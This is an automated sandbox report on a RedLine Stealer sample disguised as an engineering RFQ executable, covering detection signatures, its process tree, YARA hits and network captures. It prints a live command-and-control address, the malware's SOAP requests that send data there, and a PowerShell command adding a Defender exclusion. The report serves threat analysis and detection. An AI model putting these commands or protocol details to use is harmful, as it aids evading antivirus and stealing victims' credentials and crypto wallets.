
Windows Analysis Report
RFQ_TFS-1508-AL NASR ENGINEERING.exe

Overview

General Information

Sample name: RFQ_TFS-1508-AL NASR ENGINEERING.exe
Analysis ID: 1557873
MD5: 51e2a4cf52a06bff7b50826173d6a0ad
SHA1: d5450d3259df08a3d0c0a0b91b586e8532fab2e0
SHA256: 7087a8601eecc0ad79246fe0eb6cb2e9562b510495281dfe4c6df888b2b22b43
Tags: exe, RedLineStealer, user-threatcat_ch

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RFQ_TFS-1508-AL NASR ENGINEERING.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" MD5: 51E2A4CF52A06BFF7B50826173D6A0AD)
    • powershell.exe (PID: 6508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • CasPol.exe (PID: 3168 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CasPol.exe (PID: 7140 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • WerFault.exe (PID: 3648 cmdline: C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["193.70.111.186:13484"], "Bot Id": "hyce"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x2be8a:$a4: get_ScannedWallets
  • 0x43cd2:$a4: get_ScannedWallets
  • 0x2ace8:$a5: get_ScanTelegram
  • 0x42b30:$a5: get_ScanTelegram
  • 0x2bb0e:$a6: get_ScanGeckoBrowsersPaths
  • 0x43956:$a6: get_ScanGeckoBrowsersPaths
  • 0x2992a:$a7: <Processes>k__BackingField
  • 0x41772:$a7: <Processes>k__BackingField
  • 0x2783c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x3f684:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x2925e:$a9: <ScanFTP>k__BackingField
  • 0x410a6:$a9: <ScanFTP>k__BackingField
00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x135ca:$a4: get_ScannedWallets
  • 0x12428:$a5: get_ScanTelegram
  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
  • 0x1106a:$a7: <Processes>k__BackingField
  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1048a:$u7: RunPE
  • 0x13b41:$u8: DownloadAndEx
  • 0x9130:$pat14: , CommandLine:
  • 0x13079:$v2_1: ListOfProcesses
  • 0x1068b:$v2_2: get_ScanVPN
  • 0x1072e:$v2_2: get_ScanFTP
  • 0x1141e:$v2_2: get_ScanDiscord
  • 0x1240c:$v2_2: get_ScanSteam
  • 0x12428:$v2_2: get_ScanTelegram
  • 0x124ce:$v2_2: get_ScanScreen
  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x13509:$v2_2: get_ScanBrowsers
  • 0x135ca:$v2_2: get_ScannedWallets
  • 0x135f0:$v2_2: get_ScanWallets
  • 0x13610:$v2_3: GetArguments
  • 0x11cd9:$v2_4: VerifyUpdate
  • 0x165ea:$v2_4: VerifyUpdate
  • 0x139ca:$v2_5: VerifyScanRequest
  • 0x130c6:$v2_6: GetUpdates
  • 0x165cb:$v2_6: GetUpdates
5.2.CasPol.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe", ParentImage: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe, ParentProcessId: 5276, ParentProcessName: RFQ_TFS-1508-AL NASR ENGINEERING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, ProcessId: 6508, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe", ParentImage: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe, ParentProcessId: 5276, ParentProcessName: RFQ_TFS-1508-AL NASR ENGINEERING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, ProcessId: 6508, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe", ParentImage: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe, ParentProcessId: 5276, ParentProcessName: RFQ_TFS-1508-AL NASR ENGINEERING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, ProcessId: 6508, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T17:34:08.091098+0100 | 2045000 | 1 | Malware Command and Control Activity Detected | 193.70.111.186 | 13484 | 192.168.2.5 | 49704 | TCP
2024-11-18T17:34:11.786245+0100 | 2046056 | 1 | A Network Trojan was detected | 193.70.111.186 | 13484 | 192.168.2.5 | 49704 | TCP
2024-11-18T17:34:11.786245+0100 | 2045001 | 1 | Malware Command and Control Activity Detected | 193.70.111.186 | 13484 | 192.168.2.5 | 49704 | TCP
2024-11-18T17:34:02.747716+0100 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 193.70.111.186 | 13484 | TCP
2024-11-18T17:34:08.431819+0100 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 193.70.111.186 | 13484 | TCP
2024-11-18T17:34:14.203778+0100 | 2848200 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49717 | 193.70.111.186 | 13484 | TCP
2024-11-18T17:34:12.872627+0100 | 2849352 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49714 | 193.70.111.186 | 13484 | TCP


                    AV Detection

Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["193.70.111.186:13484"], "Bot Id": "hyce"}
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe | ReversingLabs: Detection: 48%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe | Joe Sandbox ML: detected

                    Exploits

Source: Yara match | File source: 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb@H`h source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbH source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbW source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr

                    Networking

Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49704 -> 193.70.111.186:13484
Source: Network traffic | Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 193.70.111.186:13484 -> 192.168.2.5:49704
Source: Network traffic | Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49714 -> 193.70.111.186:13484
Source: Network traffic | Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49704 -> 193.70.111.186:13484
Source: Network traffic | Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49717 -> 193.70.111.186:13484
Source: Network traffic | Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 193.70.111.186:13484 -> 192.168.2.5:49704
Source: Network traffic | Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 193.70.111.186:13484 -> 192.168.2.5:49704
Source: Malware configuration extractor | URLs: 193.70.111.186:13484
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 13484
Source: unknown | Network traffic detected: HTTP traffic on port 13484 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 13484
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 13484
Source: unknown | Network traffic detected: HTTP traffic on port 13484 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 13484
Source: unknown | Network traffic detected: HTTP traffic on port 13484 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 13484
Source: unknown | Network traffic detected: HTTP traffic on port 13484 -> 49717
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 193.70.111.186:13484
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
    Host: 193.70.111.186:13484
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
    Host: 193.70.111.186:13484
    Content-Length: 144
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
    Host: 193.70.111.186:13484
    Content-Length: 144
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettings xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
    Host: 193.70.111.186:13484
    Content-Length: 35640
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
    Host: 193.70.111.186:13484
    Content-Length: 35632
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 193.70.111.186 193.70.111.186
Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
Source: unknown | TCP traffic detected without corresponding DNS query: 193.70.111.186 (34 identical entries)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ip.sb
Source: unknown | HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
    Host: 193.70.111.186:13484
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.70.111.186:13484
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.70.111.186:13484/
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.70.111.186:13484pE
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://193.70.111.186:13484t-
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: Amcache.hve.10.dr | String found in binary or memory: http://upx.sf.net
Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb
Source: CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/geoip
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
